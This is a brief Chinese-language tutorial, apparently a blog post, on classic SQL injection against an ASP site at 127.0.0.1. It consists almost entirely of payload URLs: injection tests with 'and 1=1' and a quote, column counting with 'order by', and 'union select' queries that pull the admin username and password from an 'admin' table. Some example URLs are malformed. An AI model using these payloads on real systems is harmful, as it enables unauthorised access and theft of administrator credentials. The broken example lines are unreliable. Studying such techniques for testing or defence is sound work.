SQL注入语法

1.判断有无注入点:

http://127.0.0.1/index.asp?id=1 and 1=1

http://127.0.0.1/index.asp?id=1 and 1=2

http://127.0.0.1/index.asp?id=1′



2.猜字段数:

http://127.0.0.1/index.asp?id=1 order by 字段数

例如: http://127.0.0.1/?id=index.asp? order by 11

http://127.0.0.1/?id=index.asp? order by 12

order by 11页面显示正常 order by 12 页面报错所以字段为11



3.暴露管理员用户、密码:

http://127.0.0.1/index.asp?id=1 union select 1,2,3,4,5,6,7,8,9,10,11 from admin

1、在链接后面添加语句【union select 1,2,3,4,5,6,7,8,9,10,11 from admin】,页面显示数字为2和3

2、在链接后面添加语句【union select 1,admin,password,4,5,6,7,8,9,10,11 from admin】即可暴露管理员用户名和密码

http://127.0.0.1/index.asp?id=1 union select 1,admin,password,4,5,6,7,8,9,10,11 from admin

3、到此，即可知道管理员用户名：admin和密码：123456



>>>比较老的一种sql注入.大佬勿喷